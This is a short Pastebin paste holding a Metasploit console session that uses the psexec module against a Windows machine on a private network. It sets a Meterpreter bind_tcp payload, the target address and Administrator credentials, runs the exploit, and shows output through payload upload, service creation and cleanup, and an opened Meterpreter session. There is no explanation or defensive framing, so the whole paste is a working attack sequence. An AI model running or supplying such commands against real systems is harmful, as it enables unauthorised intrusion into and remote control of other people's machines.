Advertisement
Guest User

Untitled

a guest
Oct 11th, 2017
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.27 KB | None | 0 0
  1. use exploit/windows/smb/psexec
  2. exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
  3. PAYLOAD => windows/meterpreter/bind_tcp
  4. exploit(psexec) > set DCERPC::fake_bind_multi false
  5. DCERPC::fake_bind_multi => false
  6. exploit(psexec) > set LPORT 4445
  7. LPORT => 4445
  8. exploit(psexec) > set RHOST 192.168.1.21
  9. RHOST => 192.168.1.21
  10. exploit(psexec) > set SMBPass password
  11. SMBPass => password
  12. exploit(psexec) > set SMBUser Administrator
  13. SMBUser => Administrator
  14. exploit(psexec) > exploit
  15. [*] Connecting to the server...
  16. [*] Started bind handler
  17. [*] Authenticating to 192.168.1.21:445|WORKGROUP as user 'Administrator'...
  18. [*] Uploading payload...
  19. [*] Created \QDauyXip.exe...
  20. [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.21[\svcctl] ...
  21. [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.21[\svcctl] ...
  22. [*] Obtaining a service manager handle...
  23. [*] Creating a new service (urVJxdlg - "MXGqFoBD")...
  24. [*] Closing service handle...
  25. [*] Opening service...
  26. [*] Starting the service...
  27. [*] Removing the service...
  28. [*] Closing service handle...
  29. [*] Deleting \QDauyXip.exe...
  30. [*] Sending stage (752128 bytes) to 192.168.1.21
  31. [*] Meterpreter session 3 opened (192.168.1.11:41106 -> 192.168.1.21:4445) at 2011-07-22 20:30:14 -0500
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement